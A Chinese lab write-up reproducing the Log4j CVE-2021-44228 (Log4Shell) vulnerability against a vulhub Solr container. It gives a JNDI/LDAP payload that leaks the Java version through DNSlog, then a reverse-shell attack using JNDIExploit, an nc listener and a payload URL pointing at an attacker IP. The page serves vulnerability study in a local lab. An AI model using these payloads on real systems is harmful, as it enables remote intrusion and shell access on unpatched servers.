log4j漏洞CVE-2021-44228复现-排雷篇

一、环境搭建(用相同的环境才能保证一定成功)

下载vulhub,其他环境可能存在GET请求无效问题:

git clone https://github.com/vulhub/vulhub.git

切换到指定漏洞环境目录:

vulhub/log4j/CVE-2021-44228

开启docker:

docker compose up -d

复制代码
➜  vulhub git:(master) cd vulhub/log4j/CVE-2021-44228 
➜ CVE-2021-44228 git:(master) docker compose up -d [+] Running 9/9 
⠿ solr Pulled 107.8s 
⠿ 43c265008fae Pull complete 25.3s 
⠿ af36d2c7a148 Pull complete 26.0s 
⠿ 2b7b4d10e1c1 Pull complete 26.1s 
⠿ f264389d8f2f Pull complete 26.2s 
⠿ 1a2c46e93f4a Pull complete 26.3s 
⠿ f9506bb322c0 Pull complete 48.9s 
⠿ 96f5dad14c2c Pull complete 49.0s 
⠿ c387eff49cc3 Pull complete 90.9s [+] Running 2/2 
⠿ Network cve-2021-44228_default Created 0.1s 
⠿ Container cve-2021-44228-solr-1 Started

访问地址显示如下界面表示搭建成功: http://127.0.0.1:8983

二、漏洞验证

  1. 登陆http://dnslog.cn/获取随机域名,下图中的第一步;
  2. 漏洞页面修改url为:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xdeuza.dnslog.cn};
  3. 查看dnslog显示请求记录表示漏洞存在,上图中的第三步,未显示则点击上图中的第二步"Refresh Record";

三、反弹shell

下载JNDI注入工具,https://github.com/WhiteHSBG/JNDIExploit,MD5 (JNDIExploit.v1.4.zip) = bafe42623aae09d18bafa610844d57c7 ,之前一直用1.0总是无法成功反弹shell

解压后启动:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 172.16.242.3

同时开启nc监听:nc -lvnp 6666

nc监听和JNDIExploit在同一台机器上,IP:172.16.242.3

构造payload请求并访问:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://172.16.242.3:1389/Basic/ReverseShell/172.16.242.3/6666}

后台显示JNDI注入成功:

nc反弹shell成功上线 :

相关推荐
Narutolxy9 小时前
Python 单元测试:深入理解与实战应用20240919
python·单元测试·log4j
Flying_Fish_roe3 天前
Spring Boot-Bean注入问题
spring boot·后端·log4j
SelectDB技术团队3 天前
查询性能提升 10 倍、存储空间节省 65%,Apache Doris 半结构化数据分析方案及典型场景
数据结构·数据仓库·elasticsearch·log4j·json
&木头人&7 天前
log4j 的参数配置
log4j
&木头人&8 天前
log4j 1.x 日志输出线程以唯一ID的形式配置
单元测试·log4j
惜.己8 天前
spring项目整合log4j2日志框架(含log4j无法打印出日志的情况,含解决办法)
java·spring·junit·单元测试·log4j·idea
清星QA9 天前
log4j靶场,反弹shell
log4j
&木头人&10 天前
Log4j 1.x如何升级到Log4j 2.x
单元测试·log4j
武昌库里写JAVA11 天前
人工智能,语音识别也算一种人工智能。
java·开发语言·算法·spring·log4j
Zhong-Xin11 天前
vulhub log4j2 CVE-2021-44228漏洞复现
log4j